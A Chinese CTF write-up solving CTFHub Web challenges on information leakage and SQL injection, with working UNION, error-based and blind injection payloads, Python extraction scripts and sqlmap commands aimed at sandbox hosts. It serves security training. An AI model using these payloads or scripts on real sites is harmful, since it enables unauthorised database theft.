银河以北,吾彦最美
银河以北,吾彦最美

CTFHub——Web技能树

文章目录

  • 信息泄露
    • 目录遍历
    • PHPINFO
    • 备份文件下载
    • Git泄露
    • SVN泄露
    • HG泄露
  • SQL注入
    • 整型注入
    • 字符型注入
    • 报错注入
    • 布尔盲注
    • 时间盲注
    • MySQL结构
    • cookie注入
    • UA注入
    • Refer注入
    • 过滤空格

网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下自己的做题过程,后续的会附上原文链接

信息泄露

目录遍历

CTFHub——Web技能树_第1张图片
用python脚本找一下flag.txt的路径

import requests

url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/"

for i in range(5):
    for j in range(5):
        url_test =url+"/"+str(i)+"/"+str(j)
        r = requests.get(url_test)
        r.encoding = 'utf-8'
        get_file=r.text
        if "flag.txt" in get_file:
            print(url_test)

在这里插入图片描述
找到flag的目录在/2/1,跟着这个目录找到flag

CTFHub——Web技能树_第2张图片
在这里插入图片描述

PHPINFO

直接ctrl+f,搜索flag即可
CTFHub——Web技能树_第3张图片

备份文件下载

1)网站源码
CTFHub——Web技能树_第4张图片
根据提示,将该列表制作成字典,抓包,利用bp的intruder模块,添加变量,利用bp去爆破一下真正的备份文件名
CTFHub——Web技能树_第5张图片找到长度与其他不一样的,得到我们的备份文件名 www.zip
CTFHub——Web技能树_第6张图片
从网站上下载下来,解压,发现flag文件里不是真正的flag
在这里插入图片描述
在url里访问一下
在这里插入图片描述
2)bak文件

​ 提示flag在index.php中,结合题目是bak文件,猜测访问一下index.php.bak
CTFHub——Web技能树_第7张图片
果真存在这个文件,下载下来,flag就在里面
CTFHub——Web技能树_第8张图片
3)vim缓存
CTFHub——Web技能树_第9张图片
这里要知道什么是vim

  ​  在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓      存文件恢复原始文件内容

  ​  以 index.php 为例:第一次产生的交换文件名为 .index.php.swp
  ​  再次意外退出后,将会产生名为 .index.php.swo 的交换文件
  ​  第三次产生的交换文件则为 .index.php.swn

网页提示我们flag在index.php的源码中,我们顺着这个思路去浏览文件,但是注意swp这类隐藏文件在调用时前面要加一个 ‘ . ’

CTFHub——Web技能树_第10张图片在这里插入图片描述
4).DS_Store

​ 根据题意下载.DS_Store
CTFHub——Web技能树_第11张图片

下面几个看朋友用的一个工具,我装了有点问题,不是很好用,等弄好了再补

Git泄露

SVN泄露

HG泄露

SQL注入

整型注入

题目都说了是整型注入,省去判断类型,直接使用 **1order by 1,2…… ** 来猜一下执行我们sql查询的表有几个字段
执行到 order by 3 的时候报错了,说明查询的表有2个字段
CTFHub——Web技能树_第12张图片

此时要先保证之前的数据查不出来,之后再union 。id=-1数据不存在数据库中。使用语句 -1 union select 1,2 可以看到位置2可以插入SQL语句
CTFHub——Web技能树_第13张图片

获取数据库名称 -1 union select 1,database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sObI4nuc-1611368489311)(C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210105140140524.png)]

获取数据库中表的名称,测试的时候发现只会回显一行数据,所以使用group_concat将查询结果连接起来

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli’
CTFHub——Web技能树_第14张图片
获取表的字段名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag’
CTFHub——Web技能树_第15张图片
看到flag字段

CTFHub——Web技能树_第16张图片
查询flag字段里的值
-1 union select flag,2 from flag
CTFHub——Web技能树_第17张图片

字符型注入

字符型注入主要注意闭合后面的引号,可以用 “- -” 和“#”来注释掉后面的’ ’ ‘
CTFHub——Web技能树_第18张图片

1’ order by 1,2……–

先猜执行我们sql查询的表有几个字段,执行到3的时候报错,说明是2个字段

CTFHub——Web技能树_第19张图片
接下来跟整型差不多
查数据库 -1’ union select database(),2–
CTFHub——Web技能树_第20张图片
查表 -1’ union select group_concat(table_name),2 from information_schema.tables where table_schema=‘sqli’–

CTFHub——Web技能树_第21张图片
查字段名 -1’ union select group_concat(column_name),2 from information_schema.columns where table_name=‘flag’–
CTFHub——Web技能树_第22张图片
查flag字段里的值 -1’ union select flag,2 from flag–
CTFHub——Web技能树_第23张图片

报错注入

当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误,那么就存在报错注入的可能性。

报错注入的原理在于三个函数:count(*),rand(),floor()以及group by

1.floor()函数是用来向下取整呢个的,相当于去掉小数部分
2.rand()是随机取(0,1)中的一个数,但是给它一个参数后0,即rand(0),并且传如floor()后,
即:floor(rand(0)*2)它就不再是随机了,序列0110110

CTFHub——Web技能树_第24张图片

select count(*),(concat(database(),0x26,(floor(rand(0)*2))x from users group by x;

报错的时候会把数据库名给爆出来,使用时将database()修改一下即可

在这里插入图片描述
x就是相当于 as x,设一个别名
原理:group by 查询时,先建立一个空表,用来临时存储数据,
开始查询,group by x,序列一开始为0,临时空表里不存在就填入,之后 select 中也有rand(),值为1,插入1;
查询第二条,值为1,原有值加1
查第三条,值为0,则插入select的值,为1,与原有值冲突报错。

看题看一下操作结果:

查询数据库

1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

CTFHub——Web技能树_第25张图片

0x26=&,为了区分,得到数据库名sqli,和之前几题一样

查询数据库中的表,由于查询结果不止一个,我一开始打算使用group_concat()函数来连接,但是失败了改用limit

1 union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

CTFHub——Web技能树_第26张图片

CTFHub——Web技能树_第27张图片

查flag表里的字段

1 union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

CTFHub——Web技能树_第28张图片

查询flag字段里的值

1 union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
在这里插入图片描述

布尔盲注

布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注要盲猜试错。由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错。
CTFHub——Web技能树_第29张图片

一、盲注思路

由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下:

  1. 爆库名长度
  2. 根据库名长度爆库名
  3. 对当前库爆表数量
  4. 根据库名和表数量爆表名长度
  5. 根据表名长度爆表名
  6. 对表爆列数量
  7. 根据表名和列数量爆列名长度
  8. 根据列名长度爆列名
  9. 根据列名爆数据值

二、盲注原理

将自己的注入语句使用and?id=1并列,完成注入
在这里插入图片描述

Ⅰ、盲注常用函数

  1. substr(str,from,length):返回从下标为from截取长度为length的str子串。其中,首字符下标为1
  2. length(str):返回str串长度

Ⅱ、盲注步骤

穷举、盲猜

  1. 爆数据库名长度
    首先,通过循环i从1到无穷,使用length(database()) = i获取库名长度,i是长度,直到返回页面提示query_success即猜测成功
?id=1 and length(database())=1
#query_error
...
?id=1 and length(database())=4
#query_success
#库名长度为4
  1. 根据库名长度爆库名
    获得库名长度i后,使用substr(database(),i,1)将库名切片,循环i次,i是字符下标,每次循环要遍历字母表[a-z]作比较,即依次猜每位字符

注意观察substr(database,i,1)
i从1开始(第i个字符)

?id=1 and substr(database(),1,1)=‘a’
#query_error
...
?id=1 and substr(database(),1,1)=‘s’
#query_success
#库名第一个字符是s
...
?id=1 and substr(database(),4,1)=‘i’
#query_success
#库名第四个字符是i

#库名是sqli
  1. 对当前库爆表数量
    下一步是获取数据库内的表数量,使用mysql的查询语句select COUNT(*)。同样,要一个1到无穷的循环
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=1
#query_error

?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=2
#query_success
#当前库sqli有2张表
  1. 根据库名和表数量爆表名长度
    得到表数量i后,i就是循环次数,i是表的下标-1,大循环i次(遍历所有表),这里的i从0开始,使用limit i ,1限定是第几张表,内嵌循环j从1到无穷(穷举所有表名长度可能性)尝试获取每个表的表名长度

注意观察limit i,1
i从0开始(第i+1张表)

?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=1
#query_error
...
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=4
#query_success
#当前库sqli的第一张表表名长度为4
...
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 1,1)=4
#query_success
#当前库sqli的第二张表表名长度为4

#当前库sqli有两张表’news’和’flag‘,表名长度均为4
  1. 根据表名长度爆表名
    再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名

注意观察substr((select…limit i,1),j,1)
i从0开始(第i+1张表),j从1开始(第j个字符)

?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’
#query_error
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘n’
#query_success
#当前库sqli的第一张表表名第一个字符是n
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1)=‘g’
#query_success
#当前库sqli的第二张表表名的第四个字符是g

#当前库sqli有两张表’news‘和‘flag’

这里分析一下表名——flag在第二张表flag里面,就不用对表news操作了

  1. 对表爆列数量
    操作同对当前库爆表数量的步骤,只是要查询的表不同
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=1
#query_error

?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=2
#query_success
#当前库sqli表flag的列数为2
  1. 根据表名和列数量爆列名长度
    操作同对当前库爆表名长度的步骤,i是列标-1

注意观察limit i,1
i从0开始(第i+1列)

?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=1
#query_error
...
?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=2
#query_success
#当前库sqli表flag的第一列列名长度为2
...
?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=4
#query_success
#当前库sqli表flag的第二列列名长度为4

#当前库sqli表flag有两个列‘id’和‘flag’,列名长度为2和4
  1. 根据列名长度爆列名
    操作同对当前库爆表名的步骤,i是列标-1,j是字符下标

注意观察substr((select…limit i,1),j,1))
i从0开始(第i+1列),j从1开始(第j个字符)

?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘a’
#query_error
...
?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘i’
#query_success
#当前库sqli表flag的第一列列名第一个字符为i
...
?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 1,1),4,1)=‘g’
#query_success
#当前库sqli表flag的第二列列名第四个字符为g

#当前库sqli表flag有两个列‘id’和‘flag’
  1. 根据列名爆数据
    flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束

注意观察substr((select…),j,1)
j从1开始(flag的第j个字符)

?id=1 and substr((select flag from sqli.flag),11)=“a”
#query_error
...
?id=1 and substr((select flag from sqli.flag),11)=“c”
#query_success
#flag的第一个字符是c
...
?id=1 and substr((select flag from sqli.flag),i,1)=}#query_success
#flag的最后一个字符是}
#这里的j是计数变量j从1自增1得到的值

#出循环即可得到flag

三、脚本自动化盲注

Python脚本

由于布尔盲注有大量重复的操作,手注极其繁琐且枯燥,这里给出使用Python编写的脚本完成布尔盲注

脚本使用requests库完成GET请求,基于Python3

#导入库
import requests

#设定环境URL,由于每次开启环境得到的URL都不同,需要修改!
url = 'http://challenge-9e60bb79512ae37b.sandbox.ctfhub.com:10080/'
#作为盲注成功的标记,成功页面会显示query_success
success_mark = "query_success"
#把字母表转化成ascii码的列表,方便便利,需要时再把ascii码通过chr(int)转化成字母
ascii_range = range(ord('a'),1+ord('z'))
#flag的字符范围列表,包括花括号、a-z,数字0-9
str_range = [123,125] + list(ascii_range) + list(range(48,58))

#自定义函数获取数据库名长度
def getLengthofDatabase():
	#初始化库名长度为1
    i = 1
    #i从1开始,无限循环库名长度
    while True:
        new_url = url + "?id=1 and length(database())={}".format(i)
        #GET请求
        r = requests.get(new_url)
        #如果返回的页面有query_success,即盲猜成功即跳出无限循环
        if success_mark in r.text:
        	#返回最终库名长度
            return i
        #如果没有匹配成功,库名长度+1接着循环
        i = i + 1

#自定义函数获取数据库名
def getDatabase(length_of_database):
	#定义存储库名的变量
    name = ""
    #库名有多长就循环多少次
    for i in range(length_of_database):
    	#切片,对每一个字符位遍历字母表
    	#i+1是库名的第i+1个字符下标,j是字符取值a-z
        for j in ascii_range:
            new_url = url + "?id=1 and substr(database(),{},1)='{}'".format(i+1,chr(j))
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到库名变量里
                name += chr(j)
                #当前下标字符匹配成功,退出遍历,对下一个下标进行遍历字母表
                break
    #返回最终的库名
    return name

#自定义函数获取指定库的表数量
def getCountofTables(database):
	#初始化表数量为1
    i = 1
    #i从1开始,无限循环
    while True:
        new_url = url + "?id=1 and (select count(*) from information_schema.tables where table_schema='{}')={}".format(database,i)
        r = requests.get(new_url)
        if success_mark in r.text:
        	#返回最终表数量
            return i
        #如果没有匹配成功,表数量+1接着循环
        i = i + 1

#自定义函数获取指定库所有表的表名长度
def getLengthListofTables(database,count_of_tables):
	#定义存储表名长度的列表
	#使用列表是考虑表数量不为1,多张表的情况
    length_list=[]
    #有多少张表就循环多少次
    for i in range(count_of_tables):
    	#j从1开始,无限循环表名长度
        j = 1
        while True:
        	#i+1是第i+1张表
            new_url = url + "?id=1 and length((select table_name from information_schema.tables where table_schema='{}' limit {},1))={}".format(database,i,j)
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到表名长度的列表
                length_list.append(j)
                break
            #如果没有匹配成功,表名长度+1接着循环
            j = j + 1
    #返回最终的表名长度的列表
    return length_list

#自定义函数获取指定库所有表的表名
def getTables(database,count_of_tables,length_list):
    #定义存储表名的列表
    tables=[]
    #表数量有多少就循环多少次
    for i in range(count_of_tables):
    	#定义存储表名的变量
        name = ""
        #表名有多长就循环多少次
        #表长度和表序号(i)一一对应
        for j in range(length_list[i]):
        	#k是字符取值a-z
            for k in ascii_range:
                new_url = url + "?id=1 and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)='{}'".format(database,i,j+1,chr(k))
                r = requests.get(new_url)
                if success_mark in r.text:
                	#匹配到就加到表名变量里
                    name = name + chr(k)
                    break
        #添加表名到表名列表里
        tables.append(name)
    #返回最终的表名列表
    return tables

#自定义函数获取指定表的列数量
def getCountofColumns(table):
	#初始化列数量为1
    i = 1
    #i从1开始,无限循环
    while True:
        new_url = url + "?id=1 and (select count(*) from information_schema.columns where table_name='{}')={}".format(table,i)
        r = requests.get(new_url)
        if success_mark in r.text:
        	#返回最终列数量
            return i
        #如果没有匹配成功,列数量+1接着循环
        i = i + 1

#自定义函数获取指定库指定表的所有列的列名长度
def getLengthListofColumns(database,table,count_of_column):
	#定义存储列名长度的变量
	#使用列表是考虑列数量不为1,多个列的情况
    length_list=[]
    #有多少列就循环多少次
    for i in range(count_of_column):
        #j从1开始,无限循环列名长度
        j = 1
        while True:
            new_url = url + "?id=1 and length((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1))={}".format(database,table,i,j)
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到列名长度的列表
                length_list.append(j)
                break
            #如果没有匹配成功,列名长度+1接着循环
            j = j + 1
    #返回最终的列名长度的列表
    return length_list

#自定义函数获取指定库指定表的所有列名
def getColumns(database,table,count_of_columns,length_list):
	#定义存储列名的列表
    columns = []
    #列数量有多少就循环多少次
    for i in range(count_of_columns):
        #定义存储列名的变量
        name = ""
        #列名有多长就循环多少次
        #列长度和列序号(i)一一对应
        for j in range(length_list[i]):
            for k in ascii_range:
                new_url = url + "?id=1 and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'".format(database,table,i,j+1,chr(k))
                r = requests.get(new_url)
                if success_mark in r.text:
                	#匹配到就加到列名变量里
                    name = name + chr(k)
                    break
        #添加列名到列名列表里
        columns.append(name)
    #返回最终的列名列表
    return columns

#对指定库指定表指定列爆数据(flag)
def getData(database,table,column,str_list):
	#初始化flag长度为1
    j = 1
    #j从1开始,无限循环flag长度
    while True:
    	#flag中每一个字符的所有可能取值
        for i in str_list:
            new_url = url + "?id=1 and substr((select {} from {}.{}),{},1)='{}'".format(column,database,table,j,chr(i))
            r = requests.get(new_url)
            #如果返回的页面有query_success,即盲猜成功,跳过余下的for循环
            if success_mark in r.text:
            	#显示flag
                print(chr(i),end="")
                #flag的终止条件,即flag的尾端右花括号
                if chr(i) == "}":
                    print()
                    return 1
                break
        #如果没有匹配成功,flag长度+1接着循环
        j = j + 1

#--主函数--
if __name__ == '__main__':
	#爆flag的操作
	#还有仿sqlmap的UI美化
    print("Judging the number of tables in the database...")
    database = getDatabase(getLengthofDatabase())
    count_of_tables = getCountofTables(database)
    print("[+]There are {} tables in this database".format(count_of_tables))
    print()
    print("Getting the table name...")
    length_list_of_tables = getLengthListofTables(database,count_of_tables)
    tables = getTables(database,count_of_tables,length_list_of_tables)
    for i in tables:
        print("[+]{}".format(i))
    print("The table names in this database are : {}".format(tables))

	#选择所要查询的表
    i = input("Select the table name:")

    if i not in tables:
        print("Error!")
        exit()

    print()
    print("Getting the column names in the {} table......".format(i))
    count_of_columns = getCountofColumns(i)
    print("[+]There are {} tables in the {} table".format(count_of_columns,i))
    length_list_of_columns = getLengthListofColumns(database,i,count_of_columns)
    columns = getColumns(database,i,count_of_columns,length_list_of_columns)
    print("[+]The column(s) name in {} table is:{}".format(i,columns))

	#选择所要查询的列
    j = input("Select the column name:")

    if j not in columns:
        print("Error!")
        exit()

    print()
    print("Getting the flag......")
    print("[+]The flag is ",end="")
    getData(database,i,j,str_range)

此脚本只针对于本题,可能与其他题目不兼容
由于没有输入检测,输入没有flag的表和列,可能导致运行错误
由于盲猜是依次遍历,可以优化使用random函数或者是二分法改进算法
在这里插入图片描述

时间盲注

1. 题目信息
在这里插入图片描述
2. 页面3秒钟后才响应,说明数据库名称长度=4

1 and if(length(database())=4,sleep(3),1)
1

在这里插入图片描述

猜解数据库名称

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)	ascii(l)=108

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	ascii(i)=105

......
不断调整ASCII码的范围逐渐得到数据库名称为sqli

在这里插入图片描述
在这里插入图片描述

sqli数据库中表的数量

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1)
12

页面3秒后响应,说明有两张表
在这里插入图片描述

猜解表名

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
  ascii(n)=110

3秒后响应,说明第一张表的第一个字母为n
依次得到表名为news

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
  ascii(f)=102

3秒后响应,说明第一张表的第一个字母为f
依次得到表名为flag

猜解flag表的字段数

1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

3秒后响应,只有一个字段
在这里插入图片描述

猜解字段名

1 and if(ascii(substr((select column_name from information_schema.columns
 where table_name='flag'),1,1))=102,sleep(3),1)

一样的套路,得到字段名为flag

跟布尔盲注差不多,只不过将判断条件改成了是否有时间停顿

python脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
import time

session=requests.session()
url = "http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id="
name = ""

# for k in range(1,10):
#      for i in range(1,10):
#          print(i)
#          for j in range(31,128):
#              j = (128+31) -j
#              str_ascii=chr(j)
#              #数据库名
#              #payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))
#              #表名
#              #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))
#              #字段名
#              payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
#              start_time=time.time()
#              str_get = session.get(url=url + payolad)
#              end_time = time.time()
#              t = end_time - start_time
#              if t > 1:
#                  if str_ascii == "+":
#                      sys.exit()
#                  else:
#                      name+=str_ascii
#                      break
#          print(name)

# #查询字段内容
for i in range(1,50):
    print(i)
    for j in range(31,128):
         j = (128+31) -j
         str_ascii=chr(j)
         payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)
         start_time = time.time()
         str_get = session.get(url=url + payolad)
         end_time = time.time()
         t = end_time - start_time
         if t > 1:
             if str_ascii == "+":
                 sys.exit()
             else:
                 name += str_ascii
                 break
    print(name)

CTFHub——Web技能树_第30张图片

利用sqlmap

感觉手工注入太麻烦了,就换用了sqlmap,sqlmap真香

爆库

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 --dbs

在这里插入图片描述
爆表

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

在这里插入图片描述
爆字段

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

在这里插入图片描述
爆字段的值

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

在这里插入图片描述

MySQL结构

首先输入1,看看情况,发现是整型注入
CTFHub——Web技能树_第31张图片
之后跟整型注入一样,不手工了直接上sqlmap

爆库

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 --dbs

在这里插入图片描述
爆表

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

在这里插入图片描述
爆字段

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli -T zijdmwuykd --columns

在这里插入图片描述
爆字段值

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli -T zijdmwuykd --columns --dump

在这里插入图片描述

cookie注入

  • CTFHub——Web技能树_第32张图片
    提示cookie注入,在cookie这边尝试一下,是整型的cookie注入

CTFHub——Web技能树_第33张图片
手工注入

接下里就是看一下查询语句的字段,字段为2

CTFHub——Web技能树_第34张图片
查数据库名称,sqli
CTFHub——Web技能树_第35张图片
查询数据库里的表,vqmwpxegjy和news
CTFHub——Web技能树_第36张图片

查表里的字段 ,awgacgkdkc
CTFHub——Web技能树_第37张图片

查字段里的值
CTFHub——Web技能树_第38张图片 sqlmap
爆库

sqlmap -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

CTFHub——Web技能树_第39张图片
爆表

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli --tables

CTFHub——Web技能树_第40张图片
爆字段

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli -T vqmwpxegjy --columns

在这里插入图片描述
爆字段里的值

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli -T vqmwpxegjy --columns --dump

在这里插入图片描述

UA注入

CTFHub——Web技能树_第41张图片
根据提示,bp抓包看一下user-agent在哪儿
CTFHub——Web技能树_第42张图片
点击action发送到repeater模块,然后就跟普通的整型注入一样

  1. 猜测查询语句字段,执行到 1 order by 3 的时候页面不会显了,说明字段是2
    CTFHub——Web技能树_第43张图片CTFHub——Web技能树_第44张图片
  2. -1 union select 1,2 查看注入回显点,回显点在data:
    CTFHub——Web技能树_第45张图片
  3. 查数据库名,
    -1 union select 1,database()
    查的数据库名是sqli
    CTFHub——Web技能树_第46张图片
  4. 查数据库中的表名
    -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
    查的两张表zipqdgmgclnews
    CTFHub——Web技能树_第47张图片
  5. 查字段名
    -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='zipqdgmgcl'
    得到字段dmbkyxkflb
    CTFHub——Web技能树_第48张图片
  6. 查字段里的值,得到flag,这边 sqli.zipqdgmgcl也可以直接写zipqdgmgcl
    -1 union select 1,group_concat(dmbkyxkflb) from sqli.zipqdgmgcl
    CTFHub——Web技能树_第49张图片
    sqlmap
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 --dbs
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 -D sqli --tables
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 -D sqli -T ztoczxhmwd --columns --dump

Refer注入

CTFHub——Web技能树_第50张图片
提示在referer中输入id,但是我一开始直接抓包没有看到referer这个参数,首先要用hackbar来传参id=1,然后抓包就能看到referer这个参数了
CTFHub——Web技能树_第51张图片
CTFHub——Web技能树_第52张图片
发送到repeater,更改Referer后面的参数,注入点在这边,后面的跟整型注入一样
猜查询语句的字段数
执行到1 order by 3 看不见回显,说明查询语句字段是2
CTFHub——Web技能树_第53张图片
CTFHub——Web技能树_第54张图片
查注入回显点
-1 union select 1,2
CTFHub——Web技能树_第55张图片
查数据库名称,sqli
-1 union select 1,database()
CTFHub——Web技能树_第56张图片
查数据库里的表,cghhcnpxfwnews
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
CTFHub——Web技能树_第57张图片
cghhcnpxfw表里的字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cghhcnpxfw'
CTFHub——Web技能树_第58张图片
tfowunhewj字段的值
-1 union select 1,tfowunhewj from cghhcnpxfw
CTFHub——Web技能树_第59张图片
sqlmap(速度较慢,耐心等待)
方法一

sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 --dbs
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz --columns
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump

方法二
尝试注入,成功返回结果

将如下内容保存到sqlmap根目录下

POST / HTTP/1.1
Host: challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
Connection: close
Referer: 1
Upgrade-Insecure-Requests: 1

使用如下命令查询(referer.txt是保存在sqlmap根目录下的文件名,或者其他路径)

sqlmap -r referer.txt --level 5 --dbs
sqlmap -r referer.txt --level 5 -D sqli --tables
sqlmap -r referer.txt --level 5 -D sqli -T mpiqfobzkz --columns
sqlmap -r referer.txt --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump

CTFHub——Web技能树_第60张图片

过滤空格

题目过滤了空格,输入空格会出现hacker!!!字样
在这里插入图片描述
尝试使用特殊字符代替空格,试了好多,最后看/**/可以,只要将原先的空格替换成/**/就可以了,其他的跟整型注入一样

  1. 猜查询语句字段
    1/**/order/**/by/**/3
    CTFHub——Web技能树_第61张图片

  2. 查看注入回显点
    -1/**/union/**/select/**/1,2
    CTFHub——Web技能树_第62张图片

  3. 查数据库名称
    -1/**/union/**/select/**/1,database()
    CTFHub——Web技能树_第63张图片

  4. 查数据库里的表
    -1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
    在这里插入图片描述

  5. rohzmfodat表里的字段
    -1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='rohzmfodat'
    CTFHub——Web技能树_第64张图片

  6. 查jeqtzbgwoo字段的值
    -1/**/union/**/select/**/1,jeqtzbgwoo/**/from/**/rohzmfodat
    CTFHub——Web技能树_第65张图片
    ctfhub上有的sql注入做完了,更新了在补。其他模块后面慢慢整理。

你可能感兴趣的:(CTFHub)

  • CTFHub技能树web之文件上传(一) wz_fisher 安全web安全
